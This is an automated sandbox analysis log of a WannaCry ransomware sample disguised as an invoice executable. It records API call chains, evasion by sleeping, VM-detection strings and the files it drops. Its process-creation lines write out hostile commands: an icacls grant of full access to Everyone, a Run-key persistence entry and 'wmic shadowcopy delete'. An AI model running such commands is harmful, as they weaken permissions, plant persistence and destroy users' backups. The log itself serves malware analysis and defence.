            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Code function: 10_2_10004790
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Stalling execution: Execution stalls by calling Sleep graph_10-2207
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__sta
ck_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Window / User API: threadDelayed 807
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Window / User API: threadDelayed 1125
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Window / User API: threadDelayed 4497
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Dropped PE file which has not been started: C:\Users\user\Desktop\taskse.exe
            Source: C:\Users\user\Desktop\@WanaDecryptor@.exe Dropped PE file which has not been started: C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Evaded block: after key decision graph_10-1597
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe API coverage: 0.3 %
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216 Thread sleep count: 67 > 30
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216 Thread sleep time: -67000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6148 Thread sleep time: -50000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160 Thread sleep count: 137 > 30
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160 Thread sleep time: -411000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 964 Thread sleep time: -840000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6996 Thread sleep time: -630000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 5980 Thread sleep count: 807 > 30
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 5980 Thread sleep time: -190000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216 Thread sleep count: 1125 > 30
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6216 Thread sleep time: -1125000s >= -30000s
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160 Thread sleep count: 4497 > 30
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe TID: 6160 Thread sleep time: -13491000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\taskdl.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10002300 CloseHandle,SHGetFolderPathW,??2@YAPAXI@Z,??_U@YAPAXI@Z,swprintf,FindFirstFileW,??3@YAXPAX@Z,??3@YAXPAX@Z,wcscmp,wcscmp,wcscmp,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcscmp,wcscmp,wcscmp,wcsncpy,wcsncpy,wcsncpy,FindNextFileW,FindClose,_wcsnicmp,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,10_2_10002300
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10004A40 CloseHandle,SHGetFolderPathW,wcslen,SHGetFolderPathW,SHGetFolderPathW,wcslen,wcsrchr,wcschr,SHGetFolderPathW,wcslen,wcsrchr,swprintf,FindFirstFileW,wcscmp,wcscmp,swprintf,wcscmp,swprintf,FindNextFileW,FindClose,10_2_10004A40
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe Thread delayed: delay time: 30000
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\~SDAA18.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\~SDAA17.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\~SDAA16.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\~SD34E5.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\~SDAA19.tmp
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\~SDAA1A.tmp
            Source: cscript.exe, 00000014.00000003.2294086320.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
            Source: taskhsvc.exe, 00000056.00000003.2498844045.0000000004401000.00000004.00000020.00020000.00000000.sdmp, cached-microdesc-consensus.tmp.86.dr Binary or memory string: m UmVW9JP3JpLzwoz36YtcTnDnWTf7ggvQEMuK44kS0i0
            Source: taskhsvc.exe, 00000056.00000003.2524836000.00000000036CE000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000002.3019401323.0000000004279000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000056.00000003.2527432599.00000000036E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: >7:qEmu|Z
            Source: cscript.exe, 00000014.00000003.2294086320.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\S
            Source: taskhsvc.exe, 00000056.00000002.3012479815.000000000162E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
            Source: @WanaDecryptor@.exe, 0000003B.00000002.3004833775.00000000005E3000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000041.00000003.2422461367.0000000000506000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: @WanaDecryptor@.exe, 0000003F.00000002.3005117932.0000000000783000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
            Source: cached-microdesc-consensus.tmp.86.drBinary or memory string: m zpuSSm5bDaL2f+c/xYibjcMDyk3mKQERdNixmXVmcIw
            Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CED6BA0 RAND_poll,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,NetStatisticsGet,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetVersion,GetVersion,OPENSSL_isservice,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,RAND_add,FreeLibrary,GetTickCount,RAND_add,GlobalMemoryStatus,RAND_add,GetCurrentProcessId,RAND_add,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RAND_add,GetVersion,GetVersion,GetVersion,RAND_add,FreeLibrary,QueryPerformanceCounter,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,RAND_add,Heap32First,RAND_add,Heap32Next,Heap32ListNext,GetTickCount,GetTickCount,GetTickCount,Process32First,GetTickCount,GetTickCount,GetTickCount,GetTickCount,RAND_add,RAND_add,RAND_add,GetTickCount,RAND_add,GetTickCount,RAND_add,GetTickCount,GetTickCount,RAND_add,GetTickCount,GetTickCount,GetTickCount,Heap32ListFirst,FindCloseChangeNotification,__stack_chk_fail,RAND_event,GetTickCount,RAND_add,RAND_add,RAND_add,RAND_add,RAND_status,QueryPerformanceCounter,RAND_add,__stack_chk_fail,RAND_screen,RAND_poll,GetVersion,OPENSSL_isservice,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,GetObjectA,CRYPTO_malloc,GetDIBits,EVP_sha1,EVP_Digest,RAND_add,CRYPTO_free,DeleteObject,ReleaseDC,__stack_chk_fail,__stack_chk_fail,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_free,CRYPTO_lock,__stack_chk_fail,CRYPTO_add_lock,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,CRYPTO_lock,CRYPTO_lock,CRYPTO_push_info_,lh_new,CRYPTO_pop_info,__stack_chk_fail,__stack_chk_fail,CRYPTO_THREADID_hash,__stack_chk_fail,CRYPTO_THREADID_current,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_retrieve,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_insert,CRYPTO_lock,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,CRYPTO_lock,lh_delete,CRYPTO_lock,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,lh_num_items,lh_free,CRYPTO_lock,CRYPTO_lock,__stack_chk_fail,86_2_6CED6BA0
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_100011D0 wcsrchr,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,GetLastError,GlobalAlloc,GetTokenInformation,LoadLibraryA,GetProcAddress,wcscpy,GlobalFree,10_2_100011D0
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72C70 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CD72C70
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CD72C6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CD72C6C
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDE02FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CDE02FC
            Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeCode function: 86_2_6CDE0300 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,86_2_6CDE0300
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ubykpkpwzybxbgo789" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
            Source: C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exeCode function: 10_2_10001360 time,AllocateAndInitializeSid,time,CheckTokenMembership,FreeSid,10_2_10001360
            Source: C:\Windows\SysWOW64\cscript.exeQueries volume information: C:\ VolumeInformation
